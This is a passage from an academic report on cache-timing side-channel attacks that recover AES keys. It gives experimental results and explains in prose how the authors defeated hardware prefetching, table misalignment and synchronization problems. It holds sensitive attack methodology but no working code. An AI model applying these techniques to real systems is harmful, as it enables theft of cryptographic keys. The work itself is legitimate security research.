1 (A) Accesses from currentencryption (9th round).(B) Last round Accesses.(C) Accesses from nextencryption (1st round).
As we are not concerned about entries otherthan first two rounds, data from current en-cryption is of no use to us. But the datacontaining first round of next encryption isimportant to us. So it’s better to considerall accesses as next encryption access.
2 (A) Accesses from Last ta-ble (B) Accesses from firstand second round of nextencryption.
Here also, we need data of next encryption,so we consider the accesses as that of newencryption.
3 (A) Accesses from 8th and9th round of current encryp-tion. (B) Last round Ac-cesses.
Here, even if the data of next encryption isnot present, we can’t be sure of this situa-tion, so we simply consider these access asnext encryption access and along with nexttwo groups accesses, we consider is for newencryption.
4 (A) Accesses from 8th and9th round of current encryp-tion. (B) Few entries of lastround.
This scenario is also similar to previous sce-nario, and we will not have any problem inconsidering these accesses as new encryptionaccesses.
Table 10.1: Conflicting access resolution
48
2. We have varied number of accesses available to the attacker in each encryption,
both in the case of pre-fetching and no pre-fetching in perfectly synchronized
situation, where attacker exactly knows the start of encryption.
To get such results, we ran our attack on various number of encryptions and
plotted graph for each key byte under analysis vs the score it received during
the analysis. The complete algorithm is explained in Section 6.3.
Here, we will take the case of key byte 8 (k8). Below are two graphs showing
the plot in case of 1100 encryptions (left) and 1300 encryptions (right) for the
case of hardware pre-fetch enabled and considering whole 160 accesses chunk.
We can see that while in left, the peak although visible, is not very clear,
while in the right graph the clarity began to grow. If we increase the number
of encryptions, the difference will increase much more.
Figure 10.4: Differences in the peak for 1100 accesses
With the next graph, we can clearly see that as the number of accesses as
a bunch is available to attacker, the number of encryptions needed increases.
This is reasonable as well because with the increase in number of encryption
as a group, more cache lines are active now, which decreases the probability
of assurance about first round accesses.
In the case of hardware pre-fetching enabled, the number of accesses are defi-
nitely higher than that of its counterpart with no pre-fetching, and they also
49
Figure 10.5: Differences in the peak for 1300 encryptions
follow the same behaviour as that observed in the case of no pre-fetching.
Figure 10.6: Encryptions required (Perfectly Synch.
3. The above point assumes that attacker has perfectly synchronized data, with
start of encryption known to him/her. Here, we consider the case that if the
50
start of encryption is not known to attacker, rather attacker get continuous
chunk of accesses, the variation seems reasonable. With increasing the chunk
size the number of encryptions required will be more, as in each chunk more ac-
cesses are present and thus lesser probability. The synchronization is achieved
from the last table accesses, applying the same algorithm as that in given in
Table 10.1.
Figure 10.7: Encryptions required(synch. from last table accesses).
4. The above results are for first round result, where you could only retrieve 4
bits of every byte of the key. Second round attack is much more complex and
the results shows the same.
For second round attack, we are calculating results for four keys bytes simulta-
neously. Thus, we have 216 possible options, which can’t be plotted in a graph.
To gather the correct key sequence, we used the following simple technique.
We calculated the highest and 2nd highest score. When the difference of the
two scores are noticeably enough, we concluded the key combination with the
highest score as our key.
Till now, we were assuming ideal cases and the additional accesses are act-
ing as spurious accesses to our data decreasing the probability. We now will
compare each of the results(pre-fetching enabled and disabled) in both ideal
environment and noisy environment with some cache lines deliberately made
false. This corresponds to the real scenario, where few accesses may be missed.
51
Figure 10.8: Encryptions required for second round attack(prefetching disbaled).
Figure 10.9: Encryptions required for second round attack(prefetching enabled.
We can clearly see that the encryptions required for second round attack are
much more(order of thousands) than first round attack(order of hundreds).
5. Also, while getting actual accesses from cache, we have achieved very high
accuracy (more than 95%) with our set of tables.
52
For setting up this environment we created one big fat shared table simulating
actual AES tables. The victim process continuously accesses a random entry
in the table, thus loading it in cache. The attacker process is able to retrieve
more than 95% of accesses made by in one time quantum (which is around
31-32 accesses).
While applying this to actual AES tables, the accuracy drastically drops down
to about 70%. This will affect our results largely. Finding solution to this
problem is in scope of second stage.
53
Chapter 11
Countermeasures
While performing our attacks, there are many hurdles that we faced and crossed
with suitable tacts. Followings are the some of the major problems we faced and
their solutions.
11.1 Pre-fetching
Pre-fetcheing (specifically, hardware pre-fetching) is used in Intel machines now-
a-days to speed up the execution of the program by reducing the wait state. When
CPU requests for a memory location, it is first looked-up in the cache. In case of
cache miss, the data of that particular memory location along with the adjacent
memory locations in the same block (of the size of cache-block) is fetched in the
cache and then executed.
It is assumed that if a process is reading data from some part of the memory, it
is most likely to read data from nearby memory locations only (principle of tem-
poral locality). This is indeed very likely, because in general a process allocates
the data together and perform operations on it later. Also, in case of arrays etc,
they are accessed in contiguous location.
Extending the same concept, Hardware pre-fetcher also fetches the next to the
currently requested block of memory in cache, assuming that the next block of cache
is most likely to fetched in nearby future, thus reducing penalty during cache misses.
Modern processors support 4 types of hardware prefetchers for prefetching data.
There are 2 prefetchers associated with L1-data cache (also known as DCU) and 2
prefetchers associated with L2 cache. There is a Model Specific Register (MSR) on
every core with address of 0x1A4 that can be used to control these 4 prefetchers.
Bits 0-3 in this register can be used to either enable or disable these prefetchers.
Other bits of this MSR are reserved.
54
Figure 11.1: Intel MSR Prefetcher.
If any of the above bits are set to 1 on a core, then that particular prefetcher on
that core is disabled. Clearing that bit (setting it to 0) will enable the corresponding
prefetcher. Please note that this MSR is present in every core and changes made to
the MSR of a core will impact the prefetchers only in that core. If hyper-threading
is enabled, both the threads share the same MSR.
11.1.1 Issues
In our scenario, this feature adversely affects our attack to a great extent. Two
kinds of problems arises now. Lets discuss them step by step.
1. Victim performing the AES when accesses a table entry, not only those par-
ticular 16 entries (No. of entries in one cache block ) is being fetched, but also
the next 16 entries are fetched. Thus attacker, when trying to gather infor-
mation about cache lines being accessed by victim, will get more cache lines
as compared to the actual access. This will increase noise in our experiments.
2. The same problem occurs on attacker side as well. Attacker, when trying
to gather information about cache lines accessed, does so by first accessing
that cache line and calculating the time required to access that line. In the
55
case of hardware pre-fetching enabled, this means that when attacker is trying
to measure time for a particular cache line, the next memory block is also
brought up in the memory. Attacker thus clearly missed the opportunity to
gather information about whether the next line is accessed by victim or not.
11.1.2 Workaround
To remove the effects of pre-fetching, one way is to disable the hardware pre-fetching
in the processor. The steps to disable pre-fetching is described in appendix. This
however, is not a realistic approach because we may never get the chance to disable
hardware pre-fetching in real scenario. Also, newer architectures does not support
disabling pre-fetching.
Pre-fetching is an essential step in increasing the performance of the system, so
this step is not at all justified.
We thus propose the following approach(es) to curb the pre-fetching effects.
• In place of accessing the cache lines in sequential order one after the another,
access the cache lines such that there is a difference of atleast two lines be-
tween two cache accesses. This will remove the effect of hardware pre-fetching
because it only fetches the next line in memory.
However, there is another problem. Accesses made in this fashion can be
detected by more sophisticated modern day pre-fetchers. They looks for a
stride during the memory accesses. That is, if we try to access the cache lines
with of gap of 2 (for ex. I accessed 6th line, 8th line, 10th line), it instructs
the Operating System to pre-fetch the next line (12th line, in this case).
In order nullify such effects, we further propose the following. Access the cache
lines in some random definite order so that the effects of both hardware as well
as software pre-fetcher is removed.
Here, we have used a generated numbers in the range of 0-31 using the princi-
ples of cyclic group, by taking the generator to be 2, and taking prime modulus
as 37.
So, at each step the number generated can be represented by this equation:
n = ((2i) mod 37) ∗ 2
, where i is the ith iteration of this sequence.
The series generated is: 2, 4, 8, 16, .....
56
We can clearly see that all the numbers are generated in the range of 0-31
and they are generated pretty much in a random way for naive software pre-
fetchers to detect. Each time we access twice of the generated numbers to
generate even accesses only.
This will clearly help us in gathering the cache access patterns.
• There is now only one problem left with this approach. What will happen for
the odd cache lines. Every time accessing the even cache lines, and ignoring
the odd ones will lead to missing out the opportunity to detect those. For that
we propose the following.
In one cycle access the even lines, in another cycle access the odd lines, i.e.
access even and odd lines alternatively. This will definitely miss out the oppor-
tunity to detect all the accesses in a particular iteration, but it will allow us to
not miss the information for the other lines. The probability to get the correct
key is now reduced, but with more number of encryptions during the online
phase of the attack, will help us in retrieving the key with high accuracy.
11.2 Look-up tables Misalignment
Misalignment of lookup tables was another problem that we faced in initial stages
but it was only reported with some of the operating systems.
In ideal case, size of each cache lines are 64 bytes. One table is of 1KB. So, if we
consider the scenario where table’s entry start from the beginning of the cache lines,
then there will be no misalignment. Since the size of each loopup table entries are 4
bytes so there should be exactly 16 entries in each cache lines for no misalignment.
But, In some versions of OS we found that these table entries are not occupying
their places from the beginning of the cache lines hence creating the problem of
misalignment. Results are obvious, if the cache line x has to be accessed, then x+ 1
is being noticed.
Solution to the above problem is to write a program to check for the exactly next
entry in the case of the misalignment as it will be increased by 1.
11.3 Synchronization
Achieving synchronization in our espionage infrastructure was another challenge
that we handle in iterative manner. The first problem we faced was to develop an
efficient algorithm to communicate between two processes residing in different cores.
57
We first implemented a two way signalling methodology. But drawback with this
approach is that it was taking too much time to send and receive signals thus giving
victim enough time to perform multiple AES encryptions.
This problem was later solved by employing one way signalling mechanism. In
this approach, we were updating a shared variable between two processes and then
only process 2 sends signal to process 1. It was efficient in respect to time. Later
for further improving our algorithm, we added some delays that we learnt in section
8.2 as δ1 and δ2.
58
Bibliography
[1] Openssl. https://www.openssl.org.
[2] Wikipedia advanced encryption standard. http://en.wikipedia.org/wiki/
Advanced_Encryption_Standard. Modified: 2015-05-07.
[3] Onur Acıicmez and Cetin Kaya Koc. Trace-driven cache attacks on aes (short
paper). In Information and Communications Security, pages 112–121. Springer,
2006.
[4] Vibhor Agrawal. Cache based side channel attacks. Technical Report 38-41,
Department of Computer Science & Engineering, IIT-Bombay, India, 2014.
[5] Daniel J Bernstein. Cache-timing attacks on aes, 2005.
[6] Joan Daemen and Vincent Rijmen. The design of Rijndael: AES-the advanced
encryption standard. Springer, 2002.
[7] Tromer Eran, Dag Arne Osvik, and Adi Shamir. Efficient cache attacks on aes,
and countermeasures. Journal of Cryptology, 23(1):37–71, 2010.
[8] Irazoqui G., Mehmet S., Thomas E., and Berk S. Wait a minute! a fast,
cross-vm attack on aes. In Research in Attacks, Intrusions and Defenses, pages
299–319. Springer, 2014.
[9] Jyoti Gajrani, Pooja Mazumdar, Sampreet Sharma, and Bernard Menezes.
Challenges in implementing cache-based side channel attacks on modern proces-
sors. In 27th International Conference on VLSI Design and 13th International
Conference on Embedded Systems. IEEE, 2014.
[10] Apecechea G.I. Fine grain cross-vm attacks on xen and vmware are possible!.
IACR Cryptology ePrint Archive, page 248, 2014.
[11] David Gullasch, Endre Bangerter, and Stephan Krenn. Cache games–bringing
access-based cache attacks on aes to practice. In Security and Privacy (SP),
2011 IEEE Symposium on, pages 490–505. IEEE, 2011.
59
[12] Hu and W.-M. Lattice scheduling and covert channels. Proceedings of the
IEEE Symposium on Security and Privacy (Washington, DC, USA, 1992), SP
’92, IEEE Computer Society:pp51, 1992.
[13] Bonneau J. and Mironov I. Cache-collision timing attacks against aes. In
Cryptographic Hardware and Embedded Systems-CHES 2006 Volume 4249 of
Springe LNCS, pages 201–215. Springer, 2006.
[14] Neve M. and Seifert J.-P. Advances on access-driven cache attacks on aes. In
Selected Areas in Cryptography, pages 147–162. Springer, 2007.
[15] Weiβ M., Heinz B., and Stumpf F. A cache timing attack on aes in virtualization
environments. In Financial Cryptography and Data Security, pages 314–328.
Springer, 2012.
[16] Dag Arne Osvik, Adi Shamir, and Eran Tromer. Cache attacks and counter-
measures: the case of aes. In Topics in Cryptology–CT-RSA 2006, pages 1–20.
Springer, 2006.
[17] Tsunoo Y., T. Saito, T. Suzaki, and Shigeri. M. cryptanalysis of des imple-
mented on computers with cache. In Proc. of CHES 2003, Springer LNCS,
pages 62–76. Springer-Verlag, 2003.
[18] Yuval Yarom and Katrina E Falkner. Flush+ reload: a high resolution, low
noise, l3 cache side-channel attack. IACR Cryptology ePrint Archive, 2013:448,
2013.